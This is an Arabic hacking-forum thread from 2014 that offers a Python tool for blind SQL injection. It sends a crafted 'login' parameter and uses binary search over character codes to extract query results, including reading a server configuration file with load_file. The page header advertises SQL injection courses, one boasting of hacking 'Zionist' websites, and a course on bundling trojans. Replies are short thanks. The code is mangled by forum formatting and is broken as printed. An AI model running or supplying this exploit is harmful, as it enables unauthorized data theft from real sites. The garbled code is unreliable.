1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ أداة ] آستغلال ثغرات البليند dichotomic sql injection

الموضوع في 'قسم الأدوات - Tools' بواسطة STAY ALIVE, بتاريخ ‏2 سبتمبر 2014.

كاتب الموضوع : STAY ALIVE المشاهدات : 419 الردود : 3 ‏2 سبتمبر 2014
  1. غير متصل

    STAY ALIVE
    Active DeveloPer

    عضو منذ:
    ‏22 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    [​IMG]

    اداة تقوم باستغلال ثغرات البليند

    مميزات الاداة :

    تقوم بحصر القيمة

    مثل لمعرفة الحرف الاول من استعلام يلزمك 32-128 احتمال يعني تقريبا 100 ركوست للحصول

    على النتيجة الصحيحة


    لكن هذي الاداة تستعمل8 او 9 استعلامات فقط لجلب الحرف او الرمز

    [​IMG]

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    الاداة

    كود PHP:
    #!/usr/bin/python
    from __future__ import print_function
    import urllib2
    import urllib
    header
    ="""
    [+] dichomatic Sql Header injection
    [+] Coded by Massacreur (TxDW)
    [+] Email Webservers@hotmail.fr
    [+] Sec4ever Team

    """

    # configuration :
    url_target="http://127.0.0.1/sql.php" # url
    marquery_negatif=None # or None type
    marquery_positif="txdw" # or None type
    command="""(select load_file("/etc/init.d/apache/httpd.conf"))""" # command sqli
    file_name="data.txt"

    def verification(r):
        global 
    marquery_negatif
        
    global marquery_positif
        
    if marquery_negatif and not marquery_negatif in r:
            return 
    True
        
    if marquery_positif and marquery_positif in r:
            return 
    True

    def url
    (w,types,order):
        global 
    command
        
    global url_target
        cmd
    ="""ascii(mid(%s,%s,1))%s%s"""%(command,order,types,str(w))
        
    post_datas = {"login" """ 1 rlike if (%s ,1,0x28)"""%(cmd)}
        
    headers={"massacreur":"sec4ever"}
        
    req urllib2.Request(url_targetpost_datas,headers)
        
    r=urllib2.urlopen(req).read()
        if 
    verification(r):
            return 
    True

    def dichotomic
    (order):
        if 
    not url(0,">",order):
            return 
    False
        start
    =32
        finich
    =127
        ascii
    =[for i in range(start,finich+1)]
        
    w=ascii[len(ascii)/2]
        while 
    True:
            if 
    len(ascii)==1:
                if 
    ascii[0]==32 and url(10,"=",order):
                    return 
    10
                
    else:
                    return 
    ascii[0]
            if 
    url(w,"<",order):
                
    start=start
                finich
    =w
            
    else:
                
    start=w
                finich
    =finich
            ascii
    =[for i in range(start,finich)]
            
    w=ascii[len(ascii)/2]
    print (
    header)

    order=1
    data
    =""
    while True:
        try:
            
    req_sql=dichotomic(order)
            if 
    req_sql:
                print (
    chr(req_sql),end='')
                
    data+=chr(req_sql)
                
    order+=1
            
    else:
                break
        
    except:
            print (
    "\r\n[+]Error => order num : %s \n"order)
            break
    print (
    "\r\n")
    open(file_name,'w').write(data)
    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    Mustafa Moshkela
    DeveloPer Plus

    عضو منذ:
    ‏6 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    الوظيفة:
    طالب

    رد: آستغلال ثغرات البليند dichotomic sql injection

    عاشت ايدك
     


  3. غير متصل

    Mr.BOY
    rankrank
    Developer

    عضو منذ:
    ‏19 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    رد: آستغلال ثغرات البليند dichotomic sql injection

    سلمت يداك اخي
     


  4. غير متصل

    Sуя!ησ
    rankrank
    Developer

    عضو منذ:
    ‏21 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: آستغلال ثغرات البليند dichotomic sql injection

    الله يحفظك اخي الغالي ،
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...